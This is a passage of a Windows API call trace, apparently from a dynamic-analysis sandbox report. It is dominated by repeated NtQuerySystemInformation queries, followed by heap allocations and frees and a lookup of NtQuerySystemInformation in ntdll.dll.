SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.519] GetProcessHeap () returned 0x269489b0000 [0282.519] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x230) returned 0x26948a002a0 [0282.519] GetProcessHeap () returned 0x269489b0000 [0282.519] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c6cd90 [0282.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.183] GetProcessHeap () returned 0x269489b0000 [0286.183] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc140 [0286.183] GetProcessHeap () returned 0x269489b0000 [0286.183] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d14a0 [0286.183] GetProcessHeap () returned 0x269489b0000 [0286.183] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x104) returned 0x26948a0f0c0 [0286.185] GetProcessHeap () returned 0x269489b0000 [0286.185] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x110) returned 0x26948a51a40 [0286.185] GetProcessHeap () returned 0x269489b0000 [0286.186] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c542e0 [0286.186] GetProcessHeap () returned 0x269489b0000 [0286.186] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x118) returned 0x2694967eea0 [0286.186] GetProcessHeap () returned 0x269489b0000 [0286.186] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc4b0 [0286.186] GetProcessHeap () returned 0x269489b0000 [0286.186] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d16c0 [0286.186] GetProcessHeap () returned 0x269489b0000 [0286.186] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a00b20 | out: hHeap=0x269489b0000) returned 1 [0286.186] GetProcessHeap () returned 0x269489b0000 [0286.186] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1cc) returned 0x26949710800 [0286.187] GetProcessHeap () returned 0x269489b0000 [0286.187] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xf4) returned 0x269495b1350 [0286.189] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f1e8 | out: phModule=0xa78217f1e8*=0x7ffcea380000) returned 1 [0286.189] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0286.189] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f310, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f310, ResultLength=0x0) returned 0x0 [0286.191] GetProcessHeap () returned 0x269489b0000 [0286.191] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c53920 [0286.191] GetProcessHeap () returned 0x269489b0000 [0286.191] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x40) returned 0x26949c2fba0 [0286.191] GetProcessHeap () returned 0x269489b0000 [0286.191] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcbf30 [0286.191] GetProcessHeap () returned 0x269489b0000 [0286.191] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d17d0 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c53ea0 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a51a40 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694967eea0 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc4b0 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d16c0 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c542e0 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949710800 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.192] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269495b1350 | out: hHeap=0x269489b0000) returned 1 [0286.192] GetProcessHeap () returned 0x269489b0000 [0286.193] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c2fba0 | out: hHeap=0x269489b0000) returned 1 [0286.193] GetProcessHeap () returned 0x269489b0000 [0286.193] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcbf30 | out: hHeap=0x269489b0000) returned 1 [0286.193] GetProcessHeap () returned 0x269489b0000 [0286.193] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d17d0 | out: hHeap=0x269489b0000) returned 1 [0286.193] GetProcessHeap () returned 0x269489b0000 [0286.193] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c53920 | out: hHeap=0x269489b0000) returned 1 [0286.193] GetProcessHeap () returned 0x269489b0000 [0286.193] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c54760 | out: hHeap=0x269489b0000) returned 1 [0286.194] GetProcessHeap () returned 0x269489b0000 [0286.194] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0f0c0 | out: hHeap=0x269489b0000) returned 1 [0286.194] GetProcessHeap () returned 0x269489b0000 [0286.194] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c53ea0 | out: hHeap=0x269489b0000) returned 1 [0286.194] GetProcessHeap () returned 0x269489b0000 [0286.194] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc140 | out: hHeap=0x269489b0000) returned 1 [0286.194] GetProcessHeap () returned 0x269489b0000 [0286.194] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d14a0 | out: hHeap=0x269489b0000) returned 1 [0286.194] GetProcessHeap () returned 0x269489b0000 [0286.194] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcc400 [0286.194] GetProcessHeap () returned 0x269489b0000 [0286.194] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1510 [0286.195] GetProcessHeap () returned 0x269489b0000 [0286.195] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x104) returned 0x26948a0d850 [0286.197] GetProcessHeap () returned 0x269489b0000 [0286.197] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x110) returned 0x26948a51a40 [0286.197] GetProcessHeap () returned 0x269489b0000 [0286.197] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c53a60 [0286.197] GetProcessHeap () returned 0x269489b0000 [0286.197] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x118) returned 0x26948a00b20 [0286.197] GetProcessHeap () returned 0x269489b0000 [0286.197] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bce5b0 [0286.198] GetProcessHeap () returned 0x269489b0000 [0286.198] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1790 [0286.198] GetProcessHeap () returned 0x269489b0000 [0286.198] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x2694967eea0 | out: hHeap=0x269489b0000) returned 1 [0286.198] GetProcessHeap () returned 0x269489b0000 [0286.198] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1cc) returned 0x26949710800 [0286.199] GetProcessHeap () returned 0x269489b0000 [0286.199] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x104) returned 0x26948a0d960 [0286.199] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa78217f1e8 | out: phModule=0xa78217f1e8*=0x7ffcea380000) returned 